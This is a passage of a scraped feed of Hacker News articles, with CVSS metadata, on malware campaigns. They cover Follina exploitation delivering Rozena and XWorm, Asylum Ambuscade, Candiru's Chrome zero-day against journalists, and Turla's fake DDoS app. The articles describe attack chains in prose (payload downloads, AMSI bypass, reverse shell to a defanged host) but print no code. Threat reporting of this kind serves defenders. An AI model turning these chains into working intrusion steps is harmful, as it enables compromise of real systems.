Backdoor](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgqkZlda0c2g2igRLTOdrEftzHnVaYPBW5GyWFxmq2gYpwQJC85xMudeBpTILNLmjRqpCEQzJ1BHrUDtlNVaYEIjBIszT-yfr5cd_4eB48Ayxqg8tZogsoHViYpX26Bhq8NdJI9qMvqSr-H6uCMSDiHFlPWqQDWupWrWorWtPcyR3TFN-oXdcQihirY/s728-e1000/hacking.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgqkZlda0c2g2igRLTOdrEftzHnVaYPBW5GyWFxmq2gYpwQJC85xMudeBpTILNLmjRqpCEQzJ1BHrUDtlNVaYEIjBIszT-yfr5cd_4eB48Ayxqg8tZogsoHViYpX26Bhq8NdJI9qMvqSr-H6uCMSDiHFlPWqQDWupWrWorWtPcyR3TFN-oXdcQihirY/s728-e100/hacking.jpg>)\n\nA newly observed phishing campaign is leveraging the recently disclosed Follina security vulnerability to distribute a previously undocumented backdoor on Windows systems.\n\n\"Rozena is a backdoor malware that is capable of injecting a remote shell connection back to the attacker's machine,\" Fortinet FortiGuard Labs researcher Cara Lin [said](<https://www.fortinet.com/blog/threat-research/follina-rozena-leveraging-discord-to-distribute-a-backdoor>) in a report this week.\n\nTracked as [CVE-2022-30190](<https://thehackernews.com/2022/06/russian-hackers-exploiting-microsoft.html>), the now-patched Microsoft Windows Support Diagnostic Tool (MSDT) remote code execution vulnerability has come under heavy exploitation in recent weeks ever since it came to light in late May 2022.\n\nThe starting point for the latest attack chain observed by Fortinet is a weaponized [Office document](<https://www.virustotal.com/gui/file/432bae48edf446539cae5e20623c39507ad65e21cb757fb514aba635d3ae67d6/details>) that, when opened, connects to a [Discord CDN URL](<https://thehackernews.com/2021/04/alert-theres-new-malware-out-there.html>) to retrieve an HTML file (\"[index.htm](<https://www.virustotal.com/gui/file/3558840ffbc81839a5923ed2b675c1970cdd7c9e0036a91a0a728af14f80eff3/details>)\") that, in turn, invokes the diagnostic utility using a PowerShell command to download next-stage payloads from the same CDN attachment space.\n\nThis includes the Rozena implant (\"Word.exe\") and a batch file (\"cd.bat\") that's designed to terminate MSDT processes, establish the backdoor's persistence by means of Windows Registry modification, and download a harmless Word document as a decoy.\n\nThe malware's core function is to inject shellcode that launches a reverse shell to the attacker's host (\"microsofto.duckdns[.]org\"), ultimately allowing the attacker to take control of the system required to monitor and capture information, while also maintaining a backdoor to the compromised system.\n\n[![Rozena Backdoor](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjNyfAHkPqncAqB7jBg-H99Da5bf5sDt90p5YIMCVig5r88OcsOiWbgLBm5chCwciSnEGnHkhKHFgCzl9qJf1Ql9z0-jpkW4CI2LK1BIBn1cVtJNPYaa1pzTkmENbZ0p1h3IvCyZFRCzMHMsO22B7F7pxaB5wNSsgFBdDzMX15lBztI2-cZOcLDb0De/s728-e1000/hack.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjNyfAHkPqncAqB7jBg-H99Da5bf5sDt90p5YIMCVig5r88OcsOiWbgLBm5chCwciSnEGnHkhKHFgCzl9qJf1Ql9z0-jpkW4CI2LK1BIBn1cVtJNPYaa1pzTkmENbZ0p1h3IvCyZFRCzMHMsO22B7F7pxaB5wNSsgFBdDzMX15lBztI2-cZOcLDb0De/s728-e100/hack.jpg>)\n\nThe exploitation of the Follina flaw to distribute malware through malicious Word documents comes as social engineering attacks are [relying](<https://www.fortinet.com/blog/threat-research/notable-droppers-emerge-in-recent-threat-campaigns>) on Microsoft Excel, Windows shortcut (LNK), and ISO image files as droppers to deploy malware such as [Emotet](<https://thehackernews.com/2022/06/new-emotet-variant-stealing-users.html>), [QBot](<https://thehackernews.com/2022/01/researchers-decrypted-qakbot-banking.html>), [IcedID](<https://thehackernews.com/2022/04/new-hacking-campaign-targeting.html>), and [Bumblebee](<https://thehackernews.com/2022/07/trickbot-malware-shifted-its-focus-on.html>) to a victim's device.\n\nThe droppers are said to be distributed through emails that contain directly the dropper or a password-protected ZIP as an attachment, an HTML file that extracts the dropper when opened, or a link to download the dropper in the body of the email.\n\nWhile attacks spotted in early April prominently featured Excel files with XLM macros, Microsoft's decision to block macros by default around the same time is said to have forced the threat actors to pivot to alternative methods like [HTML smuggling](<https://thehackernews.com/2021/11/hackers-increasingly-using-html.html>) as well as .LNK and .ISO files.\n\n[![Rozena Backdoor](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgM-Z0W8o0gQ_-NFu3LEc4vr3-E4xCQdiYnwKGPPpujdLoGmbSycdUIu9d7yXk-CAqmujZXrhriSPIZT6u_fuZ4gl3MdLu9mfa5S7Ax7GXz6vh_OnWC3CgFF05v5790zMvuesJugC_saocqG0c50_NWWevAwBkithkqwummnbyocnsUs1R8mrV9mDAb/s728-e1000/hackers.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgM-Z0W8o0gQ_-NFu3LEc4vr3-E4xCQdiYnwKGPPpujdLoGmbSycdUIu9d7yXk-CAqmujZXrhriSPIZT6u_fuZ4gl3MdLu9mfa5S7Ax7GXz6vh_OnWC3CgFF05v5790zMvuesJugC_saocqG0c50_NWWevAwBkithkqwummnbyocnsUs1R8mrV9mDAb/s728-e100/hackers.jpg>)\n\nLast month, Cyble disclosed details of a malware tool called [Quantum](<https://thehackernews.com/2022/06/new-quantum-builder-lets-attackers.html>) that's being sold on underground forums so as to equip cybercriminal actors with capabilities to build malicious .LNK and .ISO files.\n\nIt's worth noting that [macros](<https://docs.microsoft.com/en-us/microsoft-365/security/intelligence/macro-malware>) have been a tried-and-tested [attack vector](<https://www.welivesecurity.com/2022/06/16/how-emotet-is-changing-tactics-microsoft-tightening-office-macro-security/>) for adversaries looking to drop ransomware and other malware on Windows systems, whether it be through phishing emails or other means.\n\nMicrosoft has since [temporarily paused](<https://thehackernews.com/2022/07/microsoft-quietly-rolls-back-plan-to.html>) its plans to disable Office macros in files downloaded from the internet, with the company telling The Hacker News that it's taking the time to make \"additional changes to enhance usability.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-09T08:49:00", "type": "thn", "title": "Hackers Exploiting Follina Bug to Deploy Rozena Backdoor", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-07-12T03:25:38", "id": "THN:35E0781FC3AEDCA2324C9B95396A5FF7", "href": "https://thehackernews.com/2022/07/hackers-exploiting-follina-bug-to.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-09T15:01:41", "description": "[![Cybercrime Group](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEido8u6GqZ98D8le5-jvCFZf7oTbyUDpBVCtJJ-aAhM6YzaxKMxxG8WjsImP_81yZbxVG0zWOpr4I6RvUcPJZ_o4GHZ930oB9ikVkOgiwVEbKIFDsUKnkhX7_9VfJk_6WeTDDHlfo36D7-sW6Wg6Z1Xp27MBtKzEBzVX5ufchx_4j9gUztfCQASBzJA/s728-e365/hacker-.jpg>)\n\nThe threat actor known as **Asylum Ambuscade** has been observed straddling cybercrime and cyber espionage operations since at least early 2020.\n\n\"It is a crimeware group that targets bank customers and cryptocurrency traders in various regions, including North America and Europe,\" ESET [said](<https://www.welivesecurity.com/2023/06/08/asylum-ambuscade-crimeware-or-cyberespionage/>) in an analysis published Thursday. \"Asylum Ambuscade also does espionage against government entities in Europe and Central Asia.\"\n\nAsylum Ambuscade was [first documented](<https://thehackernews.com/2022/03/hackers-try-to-hack-european-officials.html>) by Proofpoint in March 2022 as a nation-state-sponsored phishing campaign that targeted European governmental entities in an attempt to obtain intelligence on refugee and supply movement in the region.\n\nThe goal of the attackers, per the Slovak cybersecurity firm, is to siphon confidential information and web email credentials from official government email portals.\n\nThe attacks start off with a spear-phishing email bearing a malicious Excel spreadsheet attachment that, when opened, either exploits VBA code or the Follina vulnerability ([CVE-2022-30190](<https://thehackernews.com/2023/05/xworm-malware-exploits-follina.html>)) to download an MSI package from a remote server.\n\nThe installer, for its part, deploys a downloader written in Lua called SunSeed (or its Visual Basic Script equivalent) that, in turn, retrieves an AutoHotkey-based malware known as AHK Bot from a remote server.\n\nWhat's notable about Asylum Ambuscade is its cybercrime spree that has claimed over 4,500 victims across the world since January 2022, with a majority of them located in North America, Asia, Africa, Europe, and South America.\n\n[![Cyber Attack](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhD9rHPkfZV5rslcZvYm6hgZ3Lk4qOIRniY6qUBUV8Y12zEbBLztFeew8CseNEhk_KGvme7kJGTF1drnbaDIDvVdJYgNMumpURP0hyHGAGEzJ1HqvHW-da0FChM7HiNMbz2h5GNPW_qR-14O4AYrHTyPYP99N5E1o4nNb7iSYimyfxd36FH5NjS5t5N/s728-e365/cyber.jpg>)\n\n\"The targeting is very wide and mostly includes individuals, cryptocurrency traders, and small and medium businesses (SMBs) in various verticals,\" ESET researcher Matthieu Faou said.\n\nWhile one aspect of the attacks is designed to steal cryptocurrency, the targeting of SMBs is likely an attempt to monetize the access by selling it to other cybercriminal groups for illicit profits.\n\nThe compromise chain follows a similar pattern barring the initial intrusion vector, which entails the use of a rogue Google Ad or a traffic direction system (TDS) to redirect potential victims to a bogus website delivering a malware-laced JavaScript file.\n\nUPCOMING WEBINAR\n\n\ud83d\udd10 Mastering API Security: Understanding Your True Attack Surface\n\nDiscover the untapped vulnerabilities in your API ecosystem and take proactive steps towards ironclad security. Join our insightful webinar!\n\n[Join the Session](<https://thn.news/z-inside-2>)\n\nThe attacks have also made use of a Node.js version of AHK Bot codenamed NODEBOT that's then used to download plugins responsible for taking screenshots, plundering passwords, gathering system information, and installing additional trojans and stealers.\n\nGiven the almost identical attack chains across cybercrime and espionage efforts, it's suspected that \"Asylum Ambuscade is a cybercrime group that is doing some cyber espionage on the side.\"\n\nThe overlaps also extend to another activity cluster dubbed [Screentime](<https://thehackernews.com/2023/02/hackers-targeting-us-and-german-firms.html>) that's known to target companies in the U.S. and Germany with bespoke malware designed to steal confidential information. Proofpoint is tracking the threat actor under the name TA866.\n\n\"It is quite unusual to catch a cybercrime group running dedicated cyberespionage operations,\" Faou said, making it somewhat of a rarity in the threat landscape.\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-06-09T13:37:00", "type": "thn", "title": "Asylum Ambuscade: A Cybercrime Group with Espionage Ambitions", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-06-09T13:37:53", "id": "THN:273B5BCEB3A6EC52EA8B8BB5D09A21BF", "href": "https://thehackernews.com/2023/06/asylum-ambuscade-cybercrime-group-with.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-13T06:20:03", "description": "[![XWorm Malware](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEg9JMOTWNO4-FPPTM7TP8bkCVwriImyXvpv7VTFr2XUHtZzdcGuzRwW7vnlQ0tIPlN-PNl4NNEpYR2RsXxtxbmy5pBv51MN3oQQkFckovY9BOvN3iuzRuY9Bcm6O7J1gJI2mcv4baxrzK2D5G09a5T6mo7RogZ09HaRHGPaikoSQ6VkaVbgFCnUATwn/s728-e365/hacking-code.png>)\n\nCybersecurity researchers have discovered an ongoing phishing campaign that makes use of a unique attack chain to deliver the [XWorm malware](<https://thehackernews.com/2023/04/new-qbot-banking-trojan-campaign.html>) on targeted systems.\n\nSecuronix, which is tracking the activity cluster under the name **MEME#4CHAN**, said some of the attacks have primarily targeted manufacturing firms and healthcare clinics located in Germany.\n\n\"The attack campaign has been leveraging rather unusual meme-filled PowerShell code, followed by a heavily obfuscated XWorm payload to infect its victims,\" security researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov [said](<https://www.securonix.com/blog/securonix-threat-labs-security-meme4chan-advisory/>) in a new analysis shared with The Hacker News.\n\nThe report builds on [recent findings](<https://www.elastic.co/security-labs/attack-chain-leads-to-xworm-and-agenttesla>) from Elastic Security Labs, which revealed the threat actor's reservation-themed lures to deceive victims into opening malicious documents capable of delivering XWorm and Agent Tesla payloads.\n\nThe attacks begin with phishing attacks to distribute decoy Microsoft Word documents that, instead of using macros, weaponize the [Follina vulnerability](<https://thehackernews.com/2022/05/microsoft-releases-workarounds-for.html>) (CVE-2022-30190, CVSS score: 7.8) to drop an obfuscated PowerShell script.\n\nFrom there, the threat actors abuse the PowerShell script to bypass Antimalware Scan Interface ([AMSI](<https://learn.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal>)), disable Microsoft Defender, establish persistence, and ultimately launch the .NET binary containing XWorm.\n\n[![XWorm Malware](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj631i-4MKG41UrQ2nQGgnLcEMz9NWXnc5l47xOkgvjPbkvk2HLD_3Y0ZinyS3vqc4gN8xbDzS_XwRCMepihDHU51HUNSsAmP8g8TsnKD4_lf7khFhalw49BmoHlAS7utosUKS5PvADJ8udPQvOEEJ7yi3wROycZhtgOozGP37x99LSkwEx28t-DBRd/s728-e365/hacking.png>)\n\nInterestingly, one of the variables in the PowerShell script is named \"$CHOTAbheem,\" which is likely a reference to [_Chhota Bheem_](<https://en.wikipedia.org/wiki/Chhota_Bheem>), an Indian animated comedy adventure television series.\n\n\"Based on a quick check, it appears that the individual or group responsible for the attack could have a Middle Eastern/Indian background, although the final attribution has not yet been confirmed,\" the researchers told The Hacker News, pointing out that such keywords could also be used as a cover.\n\nXWorm is a [commodity malware](<https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/>) that's advertised for sale on underground forums and comes with a wide range of features that allows it to siphon sensitive information from infected hosts.\n\nThe malware is also a Swiss Army knife in that it can perform clipper, DDoS, and ransomware operations, spread via USB, and drop additional malware.\n\nThe exact origins of the threat actor are currently unclear, although Securonix said the attack methodology shares artifacts similar to that of [TA558](<https://thehackernews.com/2022/08/cybercrime-group-ta558-targeting.html>), which has been observed striking the hospitality industry in the past.\n\n\"Though phishing emails rarely use Microsoft Office documents since Microsoft made the decision to [disable macros by default](<https://thehackernews.com/2022/07/hackers-opting-new-attack-methods-after.html>), today we're seeing proof that it is still important to be vigilant about malicious document files, especially in this case where there was no VBscript execution from macros,\" the researchers said.\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-05-12T21:00:00", "type": "thn", "title": "XWorm Malware Exploits Follina Vulnerability in New Wave of Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-05-13T05:13:09", "id": "THN:856F9A41F44F9B2C95A68501B0D1B5A7", "href": "https://thehackernews.com/2023/05/xworm-malware-exploits-follina.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-03T09:59:40", "description": "[![Candiru Spyware Chrome Exploit](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhHUSen7gjgQ5i3C-q9vT12dujHW41TWsQeeVN4wsLFAQmcgZRsO8Q3mTYnY-5mLbMge8R31OsaEXXfqM0Netare_I-JSvbNxgMU29R5g37LRVEcub_rs2mLdXBXgq7IiYJSyEfjnDhGF-Bz78B5X9JhDReehsYhhbqLkUVpPksLtku3ko-eJgjj-9i/s728-e1000/chrome.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhHUSen7gjgQ5i3C-q9vT12dujHW41TWsQeeVN4wsLFAQmcgZRsO8Q3mTYnY-5mLbMge8R31OsaEXXfqM0Netare_I-JSvbNxgMU29R5g37LRVEcub_rs2mLdXBXgq7IiYJSyEfjnDhGF-Bz78B5X9JhDReehsYhhbqLkUVpPksLtku3ko-eJgjj-9i/s728-e100/chrome.jpg>)\n\nThe actively exploited but now-fixed Google Chrome zero-day flaw that came to light at the start of this month was weaponized by an Israeli spyware company and used in attacks targeting journalists in the Middle East.\n\nCzech cybersecurity firm Avast linked the exploitation to [Candiru](<https://thehackernews.com/2021/07/israeli-firm-helped-governments-target.html>) (aka Saito Tech), which has a history of [leveraging previously unknown flaws](<https://thehackernews.com/2021/11/israels-candiru-spyware-found-linked-to.html>) to deploy a Windows malware dubbed **DevilsTongue**, a modular implant with [Pegasus](<https://thehackernews.com/2022/07/pegasus-spyware-used-to-hack-devices-of.html>)-like capabilities.\n\nCandiru, along with NSO Group, Computer Security Initiative Consultancy PTE. LTD., and Positive Technologies, were [added to the entity list](<https://thehackernews.com/2021/11/us-sanctions-pegasus-maker-nso-group.html>) by the U.S. Commerce Department in November 2021 for engaging in \"malicious cyber activities.\"\n\n\"Specifically, a large portion of the attacks took place in Lebanon, where journalists were among the targeted parties,\" security researcher Jan Vojt\u011b\u0161ek, who reported the discovery of the flaw, [said](<https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/>) in a write-up. \"We believe the attacks were highly targeted.\"\n\nThe vulnerability in question is [CVE-2022-2294](<https://thehackernews.com/2022/07/update-google-chrome-browser-to-patch.html>), memory corruption in the [WebRTC](<https://webrtc.org/>) component of the Google Chrome browser that could lead to shellcode execution. It was addressed by Google on July 4, 2022. The same issue has since been patched by [Apple](<https://thehackernews.com/2022/07/apple-releases-security-patches-for-all.html>) and [Microsoft](<https://thehackernews.com/2022/07/microsoft-releases-fix-for-zero-day.html>) in Safari and Edge browsers.\n\nThe findings shed light on multiple attack campaigns mounted by the Israeli hack-for-hire vendor, which is said to have returned with a revamped toolset in March 2022 to target users in Lebanon, Turkey, Yemen, and Palestine via watering hole attacks using zero-day exploits for Google Chrome.\n\n[![Candiru Spyware](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjipZHJEu9rZboUnuN5vu4vzlFRiroPcgqPjPovcoi87zmmsxwT6Tw0Ye57y2r6_J3tFLfcRQOK2pEX3SQOvb6rAncsH4TTM_qkGtIQdfVJ_pWihsK_8KLSVuikizgk0g782gAxCstqG-TIxSIoJ5RfRqJgyaVUzMzhpQdJ7wP0mUmFPm_69lPZYZvs/s728-e1000/chrome-exploit.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjipZHJEu9rZboUnuN5vu4vzlFRiroPcgqPjPovcoi87zmmsxwT6Tw0Ye57y2r6_J3tFLfcRQOK2pEX3SQOvb6rAncsH4TTM_qkGtIQdfVJ_pWihsK_8KLSVuikizgk0g782gAxCstqG-TIxSIoJ5RfRqJgyaVUzMzhpQdJ7wP0mUmFPm_69lPZYZvs/s728-e100/chrome-exploit.jpg>)\n\nThe infection sequence spotted in Lebanon commenced with the attackers compromising a website used by employees of a news agency to inject malicious JavaScript code from an actor-controlled domain that's responsible for redirecting potential victims to an exploit server.\n\nVia this watering hole technique, a profile of the victim's browser, consisting of about 50 data points, is created, including details like language, timezone, screen information, device type, browser plugins, referrer, and device memory, among others.\n\nAvast assessed the information was gathered to ensure that the exploit was being delivered only to the intended targets. Should the collected data be deemed of value by the hackers, the zero-day exploit is then delivered to the victim's machine over an encrypted channel.\n\nThe exploit, in turn, abuses the heap buffer overflow in WebRTC to attain shellcode execution. The zero-day flaw is said to have been chained with a sandbox escape exploit (that was never recovered) to gain an initial foothold, using it to drop the DevilsTongue payload.\n\nWhile the sophisticated malware is capable of recording the victim's webcam and microphone, keylogging, exfiltrating messages, browsing history, passwords, locations, and much more, it has also been observed attempting to escalate its privileges by installing a vulnerable signed kernel driver (\"[HW.sys](<https://www.virustotal.com/gui/file/6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5>)\") containing a third zero-day exploit.\n\nEarlier this January, ESET [explained](<https://www.eset.com/int/about/newsroom/press-releases/research/esets-research-into-bring-your-own-vulnerable-driver-details-attacks-on-drivers-in-windows-core-1/>) how vulnerable signed kernel drivers - an approach called Bring Your Own Vulnerable Driver ([BYOVD](<https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/>)) - can become unguarded gateways for malicious actors to gain entrenched access to Windows machines. \n\nThe disclosure comes a week after Proofpoint [revealed](<https://thehackernews.com/2022/07/state-backed-hackers-targeting.html>) that nation-state hacking groups aligned with China, Iran, North Korea, and Turkey have been targeting journalists to conduct espionage and spread malware since early 2021.\n\n**_Update:_** Google Project Zero shared the below statement following the publication of the story \u2013\n\n\"CVE-2022-2294 is a memory corruption vulnerability in [libWebRTC](<https://webrtc.org/>), a video conferencing library that is widely used by browsers and mobile applications,\" the search giant's cybersecurity teams said. \"Avast reported that this vulnerability was used to target Google Chrome users in the wild.\"\n\n\"The vulnerability potentially affects other browsers, and was recently [patched](<https://support.apple.com/en-us/HT213341>) in Safari. Many mobile applications also contain the vulnerable code, though it is unclear whether the bug is exploitable. We are not aware of any active exploitation targeting platforms other than Chrome. We greatly appreciate Avast detecting and reporting this issue.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {}, "published": "2022-07-22T06:40:00", "type": "thn", "title": "Candiru Spyware Caught Exploiting Google Chrome Zero-Day to Target Journalists", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-2294"], "modified": "2022-08-03T08:33:23", "id": "THN:27F4624B58E2AB5E3EC8C74249CADF5C", "href": "https://thehackernews.com/2022/07/candiru-spyware-caught-exploiting.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-07-21T03:59:01", "description": "[![DoS Android Apps](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEi1QE9YZxJQ6JKfU-Sykp9EhrAHv5DKf6S7qEofv-1kjCV8SamqdavCZcQ9VYRPBJo1Hyb0S2mD1SzfQulPeSx9sUm-eGvZsNXCn3qcQMfYMkYO8fsqBA53p-o42rQ4uqGeyzkO1_9XItfMG_wGq3g7TdYI8GR62vky7GemJ7dthWmKIEfPcKK9qnSB/s728-e1000/russian-ddos-app.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEi1QE9YZxJQ6JKfU-Sykp9EhrAHv5DKf6S7qEofv-1kjCV8SamqdavCZcQ9VYRPBJo1Hyb0S2mD1SzfQulPeSx9sUm-eGvZsNXCn3qcQMfYMkYO8fsqBA53p-o42rQ4uqGeyzkO1_9XItfMG_wGq3g7TdYI8GR62vky7GemJ7dthWmKIEfPcKK9qnSB/s728-e100/russian-ddos-app.jpg>)\n\nRussian threat actors capitalized on the [ongoing conflict](<https://thehackernews.com/2022/07/trickbot-malware-shifted-its-focus-on.html>) against Ukraine to distribute Android malware camouflaged as an app for pro-Ukrainian hacktivists to launch distributed denial-of-service (DDoS) attacks against Russian sites.\n\nGoogle Threat Analysis Group (TAG) attributed the malware to Turla, an advanced persistent threat also known as Krypton, Venomous Bear, Waterbug, and Uroburos, and linked to Russia's Federal Security Service (FSB).\n\n\"This is the first known instance of Turla distributing Android-related malware,\" TAG researcher Billy Leonard [said](<https://blog.google/threat-analysis-group/continued-cyber-activity-in-eastern-europe-observed-by-tag/>). \"The apps were not distributed through the Google Play Store, but hosted on a domain controlled by the actor and disseminated via links on third party messaging services.\"\n\nIt's worth noting that the [onslaught ](<https://thehackernews.com/2022/04/microsoft-documents-over-200.html>)of [cyberattacks](<https://thehackernews.com/2022/05/ukraine-war-themed-files-become-lure-of.html>) in the immediate aftermath of Russia's unprovoked invasion of Ukraine prompted the latter to [form an IT Army](<https://thehackernews.com/2022/03/both-sides-in-russia-ukraine-war.html>) to stage counter-DDoS attacks against Russian websites. The goal of the Turla operation, it appears, is to use this volunteer-run effort to their own advantage.\n\nThe [decoy app](<https://www.virustotal.com/gui/file/3c62b24594ec3cacc14bdca068a0277e855967210e92c2c17bcf7c7d0d6b782a/>) was hosted on a domain masquerading as the [Azov Regiment](<https://en.wikipedia.org/wiki/Azov_Regiment>), a unit of the National Guard of Ukraine, calling on people from around the world to fight \"Russia's aggression\" by initiating a denial-of-service attack on the web servers belonging to \"Russian websites to overwhelm their resources.\"\n\n[![DoS Android Apps](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiJ03kkaYUTLinMlQQz9I43ISthyqrTsZa75Jlni48jqqkGuc8ZTNgQMW3J6DvBUkZBOOrTkzlYHoElomW1W2LTMHy5QvZHhM2i_P6XtJ-70QN_PZXzVWj9_4V5J0bvq0G3TNEsYBJTSSUU85A4Dw6EEZ0G74kPK5rSl_NODuMPTwbdTMDoREPAW_qb/s728-e1000/android-ddos.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiJ03kkaYUTLinMlQQz9I43ISthyqrTsZa75Jlni48jqqkGuc8ZTNgQMW3J6DvBUkZBOOrTkzlYHoElomW1W2LTMHy5QvZHhM2i_P6XtJ-70QN_PZXzVWj9_4V5J0bvq0G3TNEsYBJTSSUU85A4Dw6EEZ0G74kPK5rSl_NODuMPTwbdTMDoREPAW_qb/s728-e100/android-ddos.jpg>)\n\nGoogle TAG said the actors drew inspiration from another Android app distributed through a website named \"stopwar[.]pro\" that's also designed to conduct DoS attacks by continually sending requests to the target websites.\n\nThat said, the actual number of times the malicious Cyber Azov app was installed is minuscule, posing no major impact on Android users.\n\nAdditionally, the Sandworm group (aka Voodoo Bear) has been connected to a separate set of malicious activities leveraging the [Follina vulnerability](<https://thehackernews.com/2022/06/russian-hackers-exploiting-microsoft.html>) (CVE-2022-30190) in the Microsoft Windows 